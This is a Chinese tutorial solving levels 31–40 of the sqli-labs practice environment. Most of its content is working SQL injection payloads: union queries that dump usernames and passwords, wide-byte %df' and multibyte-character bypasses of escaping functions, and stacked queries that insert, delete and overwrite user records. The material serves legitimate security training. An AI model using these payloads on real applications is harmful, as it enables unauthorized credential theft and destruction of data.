sqli-libs通关教程（31-40)

第三十一关

同上关，闭合符号变为 ") 

?id=1&id=0") union select 1,2,3--+

?id=1&id=0") union select 1,database(),3 --+

?id=1&id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

?id=1&id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

?id=1&id=0") union select 1,group_concat(id,'~',username,'~',password),3 from users --+

第三十二关

宽字节注入     本关使用 %df '  闭合    被单引号包围的'security' 可以使用十六进制绕过

?id=1%df'

?id=-1%df' union select 1,2,3--+

?id=-1%df' union select 1,database(),3 --+

?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 --+

?id=-1%df' union select 1,group_concat(id,username,password),3 from users --+

第三十三关

同上关，代码一样，区别是使用addslashes()函数过滤，它不仅能转义单引号、双引号和反斜杠，还能 对NUL 字符进行转义（即 ASCII为0）也就是%00会被转义

第三十四关

post请求，我们使用浏览器的插件hackbar来进行操作，也可以加在bp抓包传递参数的末尾

post型相比于get型少了url编码，所以使用三个字节的汉字将反斜杠消耗

passwd=admin&submit=Submit&uname=admin汉'

passwd=admin&submit=Submit&uname=admin汉' union select 1,2#

passwd=admin&submit=Submit&uname=admin汉' union select 1,group_concat(id,username,password),3 from users #

第三十五关

数字型注入，也有过滤

?id=-1 union select 1,2,3--+

?id=-1 union select 1,database(),3 --+

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 --+

?id=-1 union select 1,group_concat(id,username,password),3 from users --+

第三十六关

过滤函数为mysqli_real_escape_string，和addslashes函数功能差不多，同三十二关加%df'

只需要在上关代码闭合出加%df'

?id=-1%df' union select 1,database(),3 --+

?id=-1%df' union select 1,group_concat(id,username,password),3 from users --+

第三十七关

POST请求，用的是mysqli_real_escape_string函数绕过和34关步骤相同

第三十八关

堆叠注入

闭合方式为'  在表中插入数据

?id=1';insert into users(id,username,password)values(38,'ikun','jinitaimei')--+

?id=38

第三十九关

删除用户

?id=1;delete from users where username='ikun'--+

id=38 看不到了

第四十关

闭合方式为')

修改密码

?id=1');update users set password='IKUN' where username='Dumb'--+